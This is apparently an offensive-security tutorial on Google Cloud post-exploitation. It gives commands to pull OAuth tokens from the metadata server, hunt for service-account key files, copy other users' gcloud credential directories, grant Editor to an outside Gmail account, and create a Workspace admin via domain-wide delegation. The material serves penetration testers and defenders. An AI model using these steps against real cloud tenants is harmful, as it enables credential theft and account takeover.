Google Cloud uses a resource hierarchy that is conceptually similar to a traditional filesystem. This provides a logical parent/child structure with specific attachment points for policies and permissions.
At a high level, it looks like this:
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
There are three types of roles in IAM:
Basic/Primitive roles, which include the Owner, Editor, and Viewer roles that existed prior to the introduction of IAM.
Predefined roles, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles; you can see all of them, along with the privileges they grant, here.
Custom roles, which provide granular access according to a user-specified list of permissions.
There are thousands of permissions in GCP. To check whether a role has a specific permission, you can search for the permission here and see which roles include it.
Virtual machine instances are usually assigned a service account. Every GCP project has a default service account, and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account can be used by any user or application on the machine to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
gcloud auth list
Default service accounts will look like one of the following:
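The exact addresses depend on the project, but the two default service accounts follow well-known patterns (the bracketed values are placeholders for your project's number and ID):

```
# Compute Engine default service account:
#   [PROJECT_NUMBER]-compute@developer.gserviceaccount.com
# App Engine default service account:
#   [PROJECT_ID]@appspot.gserviceaccount.com
```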
If gcloud auth list returns multiple accounts available, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using gcloud config set account [ACCOUNT] while trying the various tasks in this blog.
The service account on a GCP Compute Instance will use OAuth to communicate with the Google Cloud APIs. When access scopes are used, the OAuth token that is generated for the instance will have a scope limitation included. This defines what API endpoints it can authenticate to. It does NOT define the actual permissions.
When using a custom service account, Google recommends that access scopes are not used and that you rely entirely on IAM. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programmatically.
There are three options when setting an access scope on a VM instance:
Allow default access
Allow full access to all Cloud APIs
Set access for each API
You can see what scopes are assigned by querying the metadata URL. Here is an example from a VM with "default" access assigned:
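A sketch of that query (this is the standard metadata endpoint and the `Metadata-Flavor` header is required; the scope list in the comments is what default access typically includes, not output from any specific VM):

```shell
# Query the scopes assigned to the instance's default service account
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"

# Typical output on a VM with "default" access:
# https://www.googleapis.com/auth/devstorage.read_only
# https://www.googleapis.com/auth/logging.write
# https://www.googleapis.com/auth/monitoring.write
# https://www.googleapis.com/auth/servicecontrol
# https://www.googleapis.com/auth/service.management.readonly
# https://www.googleapis.com/auth/trace.append
```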
The most interesting thing in the default scope is devstorage.read_only. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.
Here is what you'll see from an instance with no scope limitations:
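For comparison, a sketch of the same metadata query on an unrestricted instance (the single scope shown is the typical result, not output captured from a specific VM):

```shell
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"

# Typical output on an instance with full access:
# https://www.googleapis.com/auth/cloud-platform
```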
This cloud-platform scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions.
It is possible to encounter some conflicts when using both IAM and access scopes. For example, your service account may have the IAM role of compute.instanceAdmin but the instance you've breached has been crippled with the scope limitation of https://www.googleapis.com/auth/compute.readonly. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
Default service account token
The metadata server available to a given instance will provide any user/process on that instance with an OAuth token that is automatically used as the default credentials when communicating with Google APIs via the gcloud command.
You can retrieve and inspect the token with the following curl command:
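A minimal version of that command, using the standard metadata token endpoint (the `Metadata-Flavor` header is required):

```shell
curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

# Returns JSON along the lines of:
# {"access_token":"ya29....","expires_in":3599,"token_type":"Bearer"}
```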
This token is the combination of the service account and access scopes assigned to the Compute Instance. So, even though your service account may have every IAM privilege imaginable, this particular OAuth token might be limited in the APIs it can communicate with due to access scopes.
Application default credentials
When using one of Google's official GCP client libraries, the code will automatically go searching for credentials following a strategy called Application Default Credentials.
First, it will check the source code itself. Developers can choose to statically point to a service account key file.
The next is an environment variable called GOOGLE_APPLICATION_CREDENTIALS. This can be set to point to a service account key file.
Finally, if neither of these are provided, the application will revert to using the default token provided by the metadata server as described in the section above.
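To illustrate the second option: the environment variable simply points at a key file on disk (the path below is a hypothetical placeholder):

```shell
# Point Application Default Credentials at a service account key file
export GOOGLE_APPLICATION_CREDENTIALS=/path/to/service-account-key.json
```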
Finding the actual JSON file with the service account credentials is generally much more desirable than relying on the OAuth token on the metadata server. This is because the raw service account credentials can be activated without the burden of access scopes and without the short expiration period usually applied to the tokens.
Each GCP project is provided with a VPC called default, which applies the following rules to all instances:
default-allow-internal (allow all traffic from other instances on the default network)
default-allow-ssh (allow 22 from everywhere)
default-allow-rdp (allow 3389 from everywhere)
default-allow-icmp (allow ping from everywhere)
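You can confirm which of these rules actually exist in the current project with the standard listing command:

```shell
gcloud compute firewall-rules list
```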
Meet the neighbors
Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances.
You can get a nice readable view of all the subnets in the current project with the following command:
gcloud compute networks subnets list
And an overview of all the internal/external IP addresses of the Compute Instances using the following:
gcloud compute instances list
If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.
Enumerating public ports
Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.
In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may take ages and could get your source IP blocked.
When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.
What we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.
Firewall rules can be applied to instances via the following methods:
Network tags attached to the instance
The service account assigned to the instance
All instances within the VPC network
Unfortunately, there isn't a simple gcloud command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, service accounts, and instances.
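One way to start connecting those dots is to dump the rules alongside their targeting attributes, then match them against each instance's tags and service account by hand. The `--format` projections below are one possible choice of columns, not the only option:

```shell
# Each firewall rule with its sources, allowed ports, and target tags/service accounts
gcloud compute firewall-rules list \
  --format="table(name,network,sourceRanges.list(),allowed[].list(),targetTags.list(),targetServiceAccounts.list())"

# Each instance with its network tags and attached service account
gcloud compute instances list \
  --format="table(name,tags.items.list(),serviceAccounts[].email.list())"
```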
The most common path, once you have obtained some cloud credentials or have compromised some service running inside the cloud, is to abuse misconfigured privileges the compromised account may have. So, the first thing you should do is enumerate your privileges.
Moreover, during this enumeration, remember that permissions can be set at the highest level of "Organization" as well.
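A starting point for that enumeration, assuming the compromised account is allowed to read the project's IAM policy:

```shell
# Discover the current project ID from the metadata server
PROJECT=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/project/project-id")

# Dump the project's IAM policy and look for bindings that mention your account
gcloud projects get-iam-policy "$PROJECT"
```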
Bypassing access scopes
When access scopes are used, the OAuth token that is generated for the computing instance (VM) will have a scope limitation included. However, you might be able to bypass this limitation and exploit the permissions the compromised account has.
The best ways to bypass this restriction are to find new credentials on the compromised host, to find a service account key that can be used to generate an OAuth token without restrictions, or to jump to a different, less restricted VM.
Pop another box
It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of gcloud compute instances list --quiet --format=json, look for instances with either the specific scope you want or the auth/cloud-platform all-inclusive scope.
Also keep an eye out for instances that have the default service account assigned ([PROJECT_NUMBER]-compute@developer.gserviceaccount.com).
If you find a service account key stored on the instance, you can bypass the scope limitation. These are RSA private keys that can be used to authenticate to the Google Cloud API and request a new OAuth token with no scope limitations.
Check if any service account has exported a key at some point with:
for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
    echo "Looking for keys for $i:"
    gcloud iam service-accounts keys list --iam-account "$i"
done
These files are not stored on a Compute Instance by default, so you'd have to be lucky to encounter them. The default name for the file is [project-id]-[portion-of-key-id].json. So, if your project name is test-project then you can search the filesystem for test-project*.json looking for this key file.
The contents of the file look something like this:
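The field names below are the standard ones for a GCP service account key file; every value is a placeholder. Once located, the key can be activated directly, which sidesteps any instance-level access scopes:

```shell
# Key file structure (all values are placeholders):
# {
#   "type": "service_account",
#   "project_id": "test-project",
#   "private_key_id": "...",
#   "private_key": "-----BEGIN PRIVATE KEY-----\n...\n-----END PRIVATE KEY-----\n",
#   "client_email": "some-account@test-project.iam.gserviceaccount.com",
#   "client_id": "...",
#   "token_uri": "https://oauth2.googleapis.com/token"
# }

# Activate the key and request a fresh access token
gcloud auth activate-service-account --key-file=/path/to/test-project-key.json

# Inspect the new token's scopes
curl -s "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=$(gcloud auth print-access-token)"
```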
You should see https://www.googleapis.com/auth/cloud-platform listed in the scopes, which means you are not limited by any instance-level access scopes. You now have full power to use all of your assigned IAM permissions.
Steal gcloud authorizations
It's quite possible that other users on the same box have been running gcloud commands using an account more powerful than your own. To steal their stored credentials, you'll need local root.
First, find what gcloud config directories exist in users' home folders.
$ sudo find / -name "gcloud"
You can manually inspect the files inside, but these are generally the ones with the secrets:
Now, you have the option of looking for clear text credentials in these files or simply copying the entire gcloud folder to a machine you control and running gcloud auth list to see what accounts are now available to you.
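These are the files that typically hold secrets inside a gcloud config directory, plus a sketch of reusing a stolen copy via the `CLOUDSDK_CONFIG` environment variable (the `/home/victim` path is hypothetical):

```shell
# Files that usually contain credentials:
#   ~/.config/gcloud/credentials.db
#   ~/.config/gcloud/access_tokens.db
#   ~/.config/gcloud/legacy_credentials/*/adc.json

# Copy the victim's config directory and point gcloud at it
sudo cp -r /home/victim/.config/gcloud /tmp/stolen-gcloud
sudo chown -R "$(whoami)" /tmp/stolen-gcloud
CLOUDSDK_CONFIG=/tmp/stolen-gcloud gcloud auth list
```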
Service account impersonation
Impersonating a service account can be very useful to obtain new and better privileges. There are three ways to impersonate another service account:
Authentication using RSA private keys (covered above)
Authorization using Cloud IAM policies (covered here)
Deploying jobs on GCP services (more applicable to the compromise of a user account)
Granting access to management console
Access to the GCP management console is provided to user accounts, not service accounts. To log in to the web interface, you can grant access to a Google account that you control. This can be a generic "@gmail.com" account; it does not have to be a member of the target organization.
To grant the primitive role of Owner to a generic "@gmail.com" account, though, you'll need to use the web console. gcloud will error out if you try to grant it a permission above Editor.
You can use the following command to grant a user the primitive role of Editor to your existing project:
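A sketch of that grant; the project ID and Gmail address below are placeholders:

```shell
gcloud projects add-iam-policy-binding test-project \
  --member user:attacker-account@gmail.com \
  --role roles/editor
```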
If you succeeded here, try accessing the web interface and exploring from there.
This is the highest level you can assign using the gcloud tool.
Spreading to Workspace via domain-wide delegation of authority
Workspace is Google's collaboration and productivity platform which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
Service accounts in GCP can be granted the rights to programmatically access user data in Workspace by impersonating legitimate users. This is known as domain-wide delegation. This includes actions like reading email in Gmail, accessing Google Docs, and even creating new user accounts in the G Suite organization.
Workspace has its own API, completely separate from GCP. Permissions are granted within Workspace, and there isn't any default relation between GCP and Workspace.
However, it's possible to give a service account permissions over a Workspace user. If you have access to the Web UI at this point, you can browse to IAM -> Service Accounts and see if any of the accounts have "Enabled" listed under the "domain-wide delegation" column. The column itself may not appear if no accounts are enabled (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programmatically, although there is a request for this feature in Google's bug tracker.
To create this relation, it needs to be enabled in both GCP and Workspace.
Test Workspace access
To test this access you'll need the service account credentials exported in JSON format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
This topic is a bit tricky… your service account has something called a "client_email", which you can see in the JSON credential file you export. It probably looks something like account-name@project-name.iam.gserviceaccount.com. If you try to access Workspace API calls directly with that email, even with delegation enabled, you will fail. This is because the Workspace directory does not include the GCP service accounts' email addresses. Instead, to interact with Workspace, we need to impersonate valid Workspace users.
What you really want to do is to impersonate a user with administrative access, and then use that access to do something like reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account.
GitLab has created this Python script that can do two things: list the user directory and create a new administrative account. Here is how you would use it:
You can try this script across a range of email addresses to impersonate various users. Standard output will indicate whether or not the service account has access to Workspace, and will include a random password for the new admin account if one is created.
If you have success creating a new admin account, you can log on to the Google admin console and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.